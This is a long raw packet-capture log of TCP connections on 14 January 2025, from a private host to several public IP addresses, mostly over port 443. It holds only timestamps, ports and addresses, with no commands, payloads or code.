                                                                                                                                                                                                  Jan 14, 2025 23:37:53.194366932 CET44349727104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.194762945 CET44349727104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.195359945 CET49727443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.195359945 CET49727443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.195458889 CET44349727104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.195522070 CET44349727104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.247081995 CET49727443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.324408054 CET44349727104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.324569941 CET44349727104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.325474024 CET49727443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.325618029 CET49727443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.325651884 CET44349727104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.456311941 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.456358910 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.456577063 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.456753016 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.456770897 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.922697067 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.922988892 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.923023939 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.923837900 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.924221992 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.924307108 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.924366951 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.967360020 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.099639893 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.099854946 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.099930048 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.099965096 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.100008011 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.100066900 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.100415945 CET49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.100435019 CET44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.104397058 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.104445934 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.104526043 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.104711056 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.104718924 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.584439993 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.585514069 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.585531950 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.585999966 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.587201118 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.587279081 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.587325096 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.631370068 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.733629942 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.733772993 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.733833075 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.734323978 CET49730443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.734344959 CET44349730104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.736624956 CET49732443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.736673117 CET44349732104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.736737013 CET49732443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.737046957 CET49732443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.737066031 CET44349732104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.789113998 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.947238922 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.947344065 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.947439909 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.947685003 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:54.947721958 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.258410931 CET44349732104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.258758068 CET49732443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.258826971 CET44349732104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.259349108 CET44349732104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.259620905 CET49732443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.259708881 CET44349732104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.259737015 CET49732443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.307353020 CET44349732104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.313172102 CET49732443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.409697056 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.409996033 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.410059929 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.410535097 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.410800934 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.410900116 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.410909891 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.411020994 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.411070108 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.411165953 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.411212921 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.411806107 CET44349732104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.411942005 CET44349732104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.412961960 CET49732443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.413043022 CET49732443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.413084030 CET44349732104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684286118 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684387922 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684465885 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684524059 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684575081 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684623957 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684650898 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684650898 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684673071 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684700966 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684712887 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684740067 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.684752941 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.689001083 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.689058065 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.689066887 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.689080000 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.689136982 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771028996 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771074057 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771148920 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771281004 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771281004 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771348953 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771410942 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771487951 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771505117 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771529913 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771565914 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771593094 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771706104 CET49733443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.771735907 CET44349733104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.775358915 CET49734443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.775454044 CET44349734104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.779140949 CET49734443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.779361963 CET49734443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:55.779382944 CET44349734104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.299844027 CET44349734104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.300221920 CET49734443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.300285101 CET44349734104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.300978899 CET44349734104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.301248074 CET49734443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.301347971 CET44349734104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.301354885 CET49734443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.347328901 CET44349734104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.350977898 CET49734443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.439639091 CET44349734104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.439762115 CET44349734104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.439821959 CET49734443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.440490961 CET49734443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:56.440511942 CET44349734104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:58.409270048 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                  Jan 14, 2025 23:37:58.712097883 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                  Jan 14, 2025 23:37:59.316987991 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                  Jan 14, 2025 23:37:59.603008032 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                  Jan 14, 2025 23:37:59.743016958 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:59.743093967 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:59.743232965 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:59.743416071 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:59.743432045 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.211477995 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.211925983 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.211993933 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.212374926 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.212796926 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.212866068 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.212969065 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.213073015 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.213114977 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.213216066 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.213267088 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469207048 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469300032 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469327927 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469363928 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469373941 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469434023 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469463110 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469474077 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469501019 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469760895 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.469793081 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.472301006 CET49739443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.472412109 CET44349739104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.472498894 CET49739443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.472707033 CET49739443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.472728014 CET44349739104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.492862940 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.492887974 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.493041992 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.493509054 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.493518114 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.523967028 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.963157892 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.963547945 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.963561058 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.965059042 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.966912031 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.969424963 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.969450951 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.969456911 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.969531059 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.976881981 CET44349739104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.977103949 CET49739443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.977140903 CET44349739104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.977816105 CET44349739104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.978101969 CET49739443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.978204012 CET44349739104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:00.978249073 CET49739443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.005650043 CET44349715142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.005734921 CET44349715142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.005810976 CET49715443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.018965006 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.018985987 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.019013882 CET49739443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.019077063 CET44349739104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.066972017 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.129580975 CET44349739104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.129755974 CET44349739104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.129823923 CET49739443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.130292892 CET49739443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.130312920 CET44349739104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.554147959 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.554280043 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.554541111 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.555279016 CET49740443192.168.2.16104.21.96.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.555295944 CET44349740104.21.96.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.570307970 CET49715443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.570336103 CET44349715142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.631510973 CET49743443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.631576061 CET44349743104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.631854057 CET49743443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.632118940 CET49743443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:01.632134914 CET44349743104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.107808113 CET44349743104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.108139038 CET49743443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.108203888 CET44349743104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.109688997 CET44349743104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.109771967 CET49743443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.110101938 CET49743443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.110138893 CET49743443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.110165119 CET49743443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.110214949 CET44349743104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.110393047 CET49744443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.110434055 CET49743443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.110440016 CET44349744104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.110522985 CET49744443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.110708952 CET49744443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.110721111 CET44349744104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.571830988 CET44349744104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.572113991 CET49744443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.572138071 CET44349744104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.573755980 CET44349744104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.573885918 CET49744443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.575154066 CET49744443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.575237036 CET44349744104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.575339079 CET49744443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.575346947 CET44349744104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.618010044 CET49744443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.889221907 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                  Jan 14, 2025 23:38:02.937047958 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                  Jan 14, 2025 23:38:03.147337914 CET44349744104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:03.147505045 CET44349744104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:03.147613049 CET49744443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:03.148207903 CET49744443192.168.2.16104.21.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:38:03.148226976 CET44349744104.21.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:03.193032980 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                  Jan 14, 2025 23:38:03.794207096 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                  Jan 14, 2025 23:38:05.000015974 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                  Jan 14, 2025 23:38:07.415031910 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                  Jan 14, 2025 23:38:07.749068975 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                  Jan 14, 2025 23:38:09.217015982 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                  Jan 14, 2025 23:38:12.215073109 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                  Jan 14, 2025 23:38:17.362153053 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                  Jan 14, 2025 23:38:21.823055983 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                  Jan 14, 2025 23:38:50.520589113 CET49786443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:38:50.520632029 CET44349786142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:50.520725965 CET49786443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:38:50.520953894 CET49786443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:38:50.520958900 CET44349786142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.176879883 CET44349786142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.177196980 CET49786443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.177222967 CET44349786142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.177504063 CET44349786142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.177772045 CET49786443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.177830935 CET44349786142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:38:51.218117952 CET49786443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:39:01.097371101 CET44349786142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:01.097448111 CET44349786142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:01.097503901 CET49786443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:39:01.906006098 CET49786443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:39:01.906045914 CET44349786142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:11.997324944 CET49840443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:11.997356892 CET4434984020.17.11.191192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:39:11.997437954 CET49840443192.168.2.1620.17.11.191
                                                                                                                                                                                                  Jan 14, 2025 23:39:11.997728109 CET49840443192.168.2.1620.17.11.191
